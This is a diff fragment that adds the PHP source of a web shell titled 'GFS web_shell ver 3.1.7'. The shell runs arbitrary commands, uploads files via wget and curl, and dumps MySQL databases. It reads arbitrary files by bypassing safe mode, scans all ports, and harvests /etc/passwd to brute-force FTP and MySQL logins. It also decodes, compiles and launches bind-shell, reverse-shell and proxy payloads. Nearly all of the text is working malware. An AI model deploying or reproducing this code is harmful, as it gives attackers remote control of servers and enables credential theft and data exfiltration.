+ return $result;
+}
+function db_show($host, $username, $pass)             //Âûâîä èìåşùèõñÿ ÁÄ
+{
+ $res="Exists BD: \n";
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect){
+  $res="Could not connect to MySQL!\n".mysql_error();
+ }else{
+  $db_list=mysql_list_dbs($connect);
+  while ($row = mysql_fetch_object($db_list)) {
+   $res.=$row->Database . "\n";
+  }
+  mysql_close($connect);
+ }
+ return $res;
+}
+function show_tables($bd, $host, $username, $pass)   //Âûâîä èìåşùèõñÿ òàáëèö
+{
+ if ($bd!=""){
+  $res="Exists tables: \n";
+  $connect=mysql_connect($host, $username, $pass);
+  if (!$connect){
+   $res="Could not connect to MySQL\n".mysql_error();
+  }else{
+   $r=mysql_query("SHOW TABLES FROM $bd");
+   $res="Exist tables:\n";
+   while ($row=mysql_fetch_row($r)) {
+    $res.="Table: $row[0]\n";
+    $fields=mysql_list_fields($bd, $row[0], $connect);
+    $columns=mysql_num_fields($fields);
+    $res.="| ";
+    for ($i=0; $i<$columns; $i++) {
+     $res.=mysql_field_name($fields, $i)." | ";
+    }
+    $res.="\n____________________________\n";
+   }
+   mysql_free_result($r);
+   mysql_close($connect);
+  }
+ }else
+  $res="Select data base! ";
+ return $res;
+}
+function dump_table($tab, $db,$host, $username, $pass)  //Äàìï òàáëèöû
+{
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect) {
+  $result="Could not connect to MySQL!\n".mysql_error();
+ }else{
+   if (!mysql_select_db($db,$connect)){
+    $result="Could not connect to db!\n".mysql_error();
+   }else{
+    if ($db==""){
+     $result="Select data base!";
+    }else{
+     $res1="# MySQL dump of $tab\r\n";
+     $r=mysql_query("SHOW CREATE TABLE `".$tab."`", $connect);
+     $row=mysql_fetch_row($r);
+     $res1.=$row[1]."\r\n\r\n";
+     $res1.= "# ---------------------------------\r\n\r\n";
+     $res2 = '';
+     $r=mysql_query("SELECT * FROM `".$tab."`", $connect);
+     if (mysql_num_rows($r)>0){
+      while (($row=mysql_fetch_assoc($r))){
+       $keys=implode("`, `", array_keys($row));
+       $values=array_values($row);
+       foreach($values as $k=>$v){
+        $values[$k]=addslashes($v);
+       }
+       $values=implode("', '", $values);
+       $res2.="INSERT INTO `".$tab."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+      }
+      $res2.="\r\n# ---------------------------------";
+     }
+     $result=$res1.$res2;
+     mysql_close($db);
+    }
+   }
+ }
+
+ return $result;
+}
+function down_tb($tab, $db,$host, $username, $pass){
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect) {
+  die("Could not connect to MySQL!\n".mysql_error());
+ }else{
+   if (!mysql_select_db($db,$connect)){
+    die("Could not connect to db!\n".mysql_error());
+   }else{
+    if ($db==""){
+     die("Select data base!");
+    }else{
+     $res1="";
+     $r=mysql_query("SELECT * FROM `".$tab."`", $connect);
+     if (mysql_num_rows($r)>0){
+      while (($row=mysql_fetch_assoc($r))){
+       foreach($row as $k=>$v){
+        $res1.=$v."\t";
+       }
+       $res1.="\n";
+      }
+     }
+     mysql_close($db);
+    }
+   }
+ }
+
+ return $res1;
+}
+function safe_mode_fuck($fil,$host, $username, $pass, $dbname)//Îáõîä áåçîïàñíîãî ğåæèìà
+{
+ $connect=mysql_connect($host,$username,$pass);
+ if($connect){
+  if(mysql_select_db($dbname,$connect)){
+   $c="DROP TABLE IF EXISTS temp_gfs_table;";
+   mysql_query($c);
+   $c="CREATE TABLE `temp_gfs_table` ( `file` LONGBLOB NOT NULL );";
+   mysql_query($c);
+   $c="LOAD DATA INFILE \"".$fil."\" INTO TABLE temp_gfs_table;";
+   mysql_query($c);
+   $c="SELECT * FROM temp_gfs_table;";
+   $r=mysql_query($c);
+   while(($row=mysql_fetch_array($r))){
+    $res.=htmlspecialchars($row[0]);
+   }
+   $c="DROP TABLE IF EXISTS temp_gfs_table;";
+   mysql_query($c);
+   }else
+    $res= "Can't select database";
+  mysql_close($db);
+  }else
+   $res="Can't connect to mysql server";
+ return $res;
+}
+function portscan($host)
+{
+ global $port;
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center>Host:  </td><td alling=center><b><font color=green> ".$host." </b></font></td></tr>";
+ for($i=1; $i<=65535; $i++){
+  $fp=fsockopen($host, $i, $errno, $errstr, 4);
+  if($fp){
+   fclose($fp);
+   if(isset($port[$i])){
+    $k=$port[$i];
+   }else
+    $k=getservbyport($i, "TCP");
+   if($k==""){$k="N\A";}
+   echo "<tr><td alling=center>Port: ".$i." </td><td alling=center><b><font color=green>".$k."</b></font></td>";
+   echo "</tr>";
+  }
+ }
+ echo "</table>";
+}
+function pwd_conwert()
+{
+ $res="";
+ if(file_exists("/etc/passwd")){
+  $input=implode(file("/etc/passwd"));
+  $input=explode("\n", $input);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ";
+  }
+  $res=explode(" ",$res);
+ }else{
+  $input=implode(ex("cat /etc/passwd"));
+  $input=explode("\n", $input);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ";
+  }
+  $res=explode(" ",$res);
+ }
+ return $res;
+}
+function brute($type,$type2,$host,$file)
+{
+ if($type2=="login:login"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, $v)){
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,$v);
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:empty"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, "")){
+      echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,"");
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:number"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     for($j=0; $j<=999; $j++){
+      if (ftp_login($conn_id, $v, "$j")){
+       echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      ftp_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     for($j=0; $j<=999; $j++){
+      $conn_id=mysql_connect($host,$v,"$j");
+      if($conn_id){
+        echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+       }
+       mysql_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:nigol"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, strrev($v))){
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,strrev($v));
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:lib"){
+  $input=file($file);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ".$word[1]." ";
+  }
+  $lib=explode(" ",$res);
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     foreach($lib as $kk=>$vv){
+      $conn_id=ftp_connect($host);
+      if(!$conn_id){ die("Coud not connect");}
+      if (ftp_login($conn_id, $v, $lib[$kk])){
+       echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      ftp_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     foreach($lib as $kk=>$vv){
+      $conn_id=mysql_connect($host,$v,$lib[$kk]);
+      if($conn_id){
+       echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      mysql_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="lib:lib"){
+  $input=file($file);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ".$word[1]." ";
+  }
+  $lib=explode(" ",$res);
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $count_lib=count($lib);
+   for($kk=0; $kk<$count_lib; $kk=$kk+2){
+    $conn_id=ftp_connect($host);
+    if(!$conn_id){ die("Coud not connect");}
+    if (ftp_login($conn_id,$lib[$kk],$lib[$kk+1])){
+     echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+    }
+    ftp_close($conn_id);
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $count_lib=count($lib);
+   for($kk=0; $kk<$count_lib; $kk=$kk+2){
+    if($lib[$kk]!=""){
+     $conn_id=mysql_connect($host,$lib[$kk],$lib[$kk+1]);
+     if($conn_id){
+      echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     mysql_close($conn_id);
+    }
+   }
+  echo "</table>";
+  }
+ }
+}
+
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////////// ÊÎÄ //////////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+echo $HTML;
+echo "<font  face=Verdana size=2 color=blue><b>";
+echo (rep_char("&nbsp;",15));
+echo "GFS web_shell ver 3.1.7 </b></font>";
+echo "<hr size=3 color=black>";
+sysinfo();
+echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+echo "<table BORDER=1 align=center>";
+if($r_act=="nav" OR $r_act==NULL){
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
+}else
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
+if(!$safe_mode){
+ if($r_act=="bind"){
+  echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
+ }else
+  echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
+}
+
+if(function_exists(fsockopen)){
+ if($r_act=="port"){
+  echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"port\"><b>PortScan</b></td>";
+ }else
+  echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"port\"><b>PortScan</b></td>";
+}
+if($r_act=="brute"){
+ echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"brute\"><b>Brute</b></td>";
+}else
+ echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"brute\"><b>Brute</b></td>";
+if($r_act=="eval"){
+ echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"eval\"><b>Eval</b></td>";
+}else
+ echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"eval\"><b>Eval</b></td>";
+echo "<td><input type=submit name=\"b_act\" value=\"Change\"></td></tr></table></form>";
+################## ACTION ######################################################
+if($r_act=="nav" OR $r_act==NULL){
+ $box=$_POST['box'];
+ if($_POST['b_save']){
+  $res=save_file($_POST['text'],$_POST['fname'],$_POST['dname']);
+ }elseif($_POST['b_new_file']){
+  open_file($_POST['new'],"wb",$_POST['dname']);
+ }elseif($_POST['b_open_file']){
+  open_file($_POST['fname'],"r",$_POST['dname']);
+ }elseif($_POST['b_mail']){
+  $res="Function under construction!!!!!!!!!";
+ }elseif($_POST['b_run']){
+  chdir($_POST['wdir']);
+  $dir=getcwd();
+  $res=ex($_POST['cmd']);
+ }elseif($_POST['b_f_file']){
+  chdir($_POST['wdir']);
+  $dir=getcwd();
+  $res=ex("whereis ".$_POST['ffile']);
+ }elseif($_POST['b_upload']){
+  $s="Uploading file ".$_POST['lfilename']." use the ".$box;
+  $res=up_file($_POST['lfilename'],$_POST['tfilename'],$_POST['box']);
+ }elseif($_POST['b_mydb']){                              //Âûâîäèì ñïèñîê ÁÄ
+  $s="show_exists_db";
+  $res=db_show($_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif ($_POST['b_runsql']){                           //Âûïîëíÿåì SQL çàïğîñ
+  $s="SQL: ".$sql;
+  $res=run_sql($_POST['sql'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif($_POST['b_base']){                              //Âûâîäèì ñïèñîê òàáëèö
+  $s="show_exists_tables";
+  $res=show_tables($_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif($_POST['b_table']){                             //Âûâîäèì äàìï òàáëèöû
+  $s="Dump of ".$_POST['tablename'];
+  $tablename=$_POST['tablename'];
+  if ($tablename!=""){
+   $res=dump_table($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  }else
+   $res="Select table!";
+ }elseif($_POST['b_safe_fuck']){                        //Îáõîä áåçîïàñíîãî ğåæèìà
+  $s="Open file ".$sfilename." with MySQL:";
+  $res=safe_mode_fuck($_POST['sfilename'],$_POST['host'], $_POST['username'], $_POST['pass'], $_POST['dbname']);
+ }elseif($_POST['b_dfilename']){                        //Îáõîä áåçîïàñíîãî ğåæèìà
+  $s="Dump in ".$dfilename." from ".$_POST['tablename'].":";
+  $res=run_sql("SELECT * INTO OUTFILE '".addslashes($_POST['dfilename'])."' FROM ".$_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }
+ if ($host=="") {$host="localhost";}
+ if(isset($res)){
+  echo "<table BORDER=1 align=center>";
+  echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+  echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+  echo $res;
+  echo "</textarea></td></tr></table>";
+ }
+################## EXECUTE #####################################################
+ if(!$safe_mode){
+  $dir=getcwd();
+  echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+  echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+  echo "<table BORDER=1 align=center>";
+  echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Run command: </b></td></tr><font size=-2>";
+  echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"\" name=\"cmd\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Run\" name=\"b_run\"></td></tr>";
+  echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"$dir\" name=\"wdir\"></td>";
+  echo "</tr></table></form>";
+ }
+ echo "<hr size=3 color=black>";
+#################### UPLOAD ####################################################
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Upload files: </b></td></tr><font size=-2>";
+ if ($box==""){ $box="fopen";}
+ echo ("<tr><td alling=\"center\"><b>Use/from: </b><SELECT name=\"box\">");
+ echo("<OPTION>$box</option>");
+ echo("<OPTION value=\"PC\">PC</option>
+       <option value=\"WGET\">WGET</option><option value=\"FETCH\">
+       FETCH</option><option value=\"LYNX\">LYNX</option>
+       <option value=\"cURL\">cURL</option>
+       <option value=\"fopen\">fopen</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b>File: </b><input type=\"text\" name=\"lfilename\" size=50></td></tr>";
+ echo "<tr><td alling=\"center\"><b>Target: </b><input type=\"text\" name=\"tfilename\"
+      size=30  value=\"$tfilename\"></td></tr>";
+ echo "<tr><td alling=\"center\"><input type=\"submit\" name=\"b_upload\" value=\"UPLOAD\"></td></tr></table></form></font></font>";
+ echo "<hr size=3 color=black>";
+##################### MySQL ####################################################
+ if(isset($_POST['host'])){
+  $host=$_POST['host'];
+ }
+ if(isset($_POST['dbname'])){
+  $dbname=$_POST['dbname'];
+ }
+ if(isset($_POST['tablename'])){
+  $tablename=$_POST['tablename'];
+ }
+ if(isset($_POST['sql'])){
+  $sql=$_POST['sql'];
+ }
+ if(isset($_POST['sfilename'])){
+  $filename=$_POST['sfilename'];
+ }
+ if(isset($_POST['dfilename'])){
+  $dfilename=$_POST['dfilename'];
+ }
+ if(isset($_POST['username'])){
+  $username=$_POST['username'];
+ }
+ if(isset($_POST['pass'])){
+  $pass=$_POST['pass'];
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>MySQL DB connect: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><b>Host name:</b></td>";
+ echo "<td alling=\"center\"><b>DB name:</b></td>";
+ echo "<td alling=\"center\"><b>Table name:</b></td>";
+ echo "<td alling=\"center\"><b>SQL command: </b></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"host\" value=\"$host\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"dbname\" value=\"$dbname\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"tablename\" value=\"$tablename\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"sql\" value=\"$sql\"></td></tr>");
+ echo "<tr><td alling=\"center\"><b>User name:</b></tb>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_base\" value=\"Dump DB\"></td>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_table\" value=\"Dump table\"></td>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_runsql\" value=\"Run SQL\"></tb></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"username\" value=\"$username\"></td><td alling=\"center\"></td><td alling=\"center\"><input type=\"submit\" name=\"b_dtable\" value=\"Download\"></td></tr>");
+ echo "<tr><td alling=\"center\"><b>Pass: </b></td>";
+ if ($safe_mode){
+  echo "<td alling=\"center\"><b>OpenFilename: </b></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>";
+ }else
+  echo "<td alling=\"center\"></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"pass\" value=\"$pass\"></td>");
+ if ($safe_mode){
+  echo "<td alling=\"center\"><input type=\"text\" name=\"sfilename\" value=\"$filename\"></td><td alling=\"center\"><input type=\"text\" name=\"b_dfilename\" value=\"$dfilename\"></td></tr>";
+ }else
+  echo "<td alling=\"center\"></td><td alling=\"center\"><input type=\"text\" name=\"dfilename\" value=\"$dfilename\"></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"submit\" name=\"b_mydb\" value=\"Show exists DB\"></td>");
+ if ($safe_mode){
+  echo ("<td alling=\"center\"><input type=\"submit\" name=\"b_safe_fuck\" value=\"SafeMode FileOpen\"></td>");
+ }else
+  echo "<td alling=\"center\"></td>";
+ echo("<td alling=\"center\"><input type=\"submit\" name=\"b_dfilename\" value=\"Dump table\"></td>");
+ echo "</tr></table></font></font>";
+ echo "<hr size=3 color=black>";
+################## NAVIGATION ##################################################
+ list_dir();
+}
+##################### PortScan #################################################
+if($r_act=="port"){
+ if($_POST['host']==""){
+  $host="localhost";
+ }else
+  $host=$_POST['host'];
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Scan host: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$host."\" name=\"host\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Scan\" name=\"b_scan\"></td></tr>";
+ echo "</tr></table></form>";
+ if($_POST['b_scan']){
+  portscan($host);
+ }
+}
+##################### PortBind #################################################
+if($r_act=="bind"){
+ if($_POST['b_bind']){
+  if($_POST['box']=="C++"){
+   save_file(base64_decode($port_c),"/var/tmp/gfs.c",getcwd());
+   ex("gcc /var/tmp/gfs.c");
+   unlink("/var/tmp/gfs.c");
+   ex("/var/tmp/a.out ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo ex("ps -aux | grep a.out");
+   echo "</textarea></td></tr></table>";
+  }
+  if($_POST['box']=="Perl"){
+   save_file(base64_decode($port_pl),"/var/tmp/gfs.pl",getcwd());
+   ex("perl /var/tmp/gfs.pl ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo ex("ps -aux | grep gfs.pl");
+   echo "</textarea></td></tr></table>";
+  }
+ }
+ if($_POST['b_connect']){
+  if($_POST['box']=="C++"){
+   save_file(base64_decode($back_connect_c),"/var/tmp/gfs.c",getcwd());
+   ex("gcc -o /var/tmp/gfs.c /var/tmp/gfs");
+   unlink("/var/tmp/gfs.c");
+   ex("/var/tmp/gfs ".$_POST['ip']." ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...";
+   echo "</textarea></td></tr></table>";
+  }
+  if($_POST['box']=="Perl"){
+   save_file(base64_decode($back_connect_pl),"/var/tmp/gfs.pl",getcwd());
+   ex("perl /var/tmp/gfs.pl ".$_POST['ip']." ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...";
+   echo "</textarea></td></tr></table>";
+  }
+ }
+ if($_POST['b_proxy']){
+  save_file(stripslashes(base64_decode($prx1).$_POST['port'].base64_decode($prx2)),"/var/tmp/gfs.pl",getcwd());
+  ex("perl /var/tmp/gfs.pl");
+  echo "<table BORDER=1 align=center>";
+  echo "<tr><td alling=center><b>Proxy</b></td></tr>";
+  echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+  echo ex("ps -aux | grep gfs.pl");
+  echo "</textarea></td></tr></table>";
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Bind Port: </b></td></tr><font size=-2>";
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"C++\">C++</option>
+       <option value=\"Perl\">Perl</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>BindPort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Bind\" name=\"b_bind\"></td></tr>";
+ echo "</tr></table></form>";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Back connect: </b></td></tr><font size=-2>";
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"C++\">C++</option>
+       <option value=\"Perl\">Perl</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>RemotePort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td></tr>";
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>RemoteIp: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$REMOTE_ADDR."\" name=\"ip\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Connect\" name=\"b_connect\"></td></tr>";
+ echo "</tr></table></form>";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>HTTPProxy: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>ProxyPort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"46660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Create\" name=\"b_proxy\"></td></tr>";
+ echo "</tr></table></form>";
+}
+##################### Brute ####################################################
+if($r_act=="brute"){
+ if(isset($_POST['brute_host'])){
+  $host=$_POST['brute_host'];
+ }else
+  $host="localhost";
+ if(isset($_POST['lib'])){
+  $lib=$_POST['lib'];
+ }else
+  $lib="  [library]";
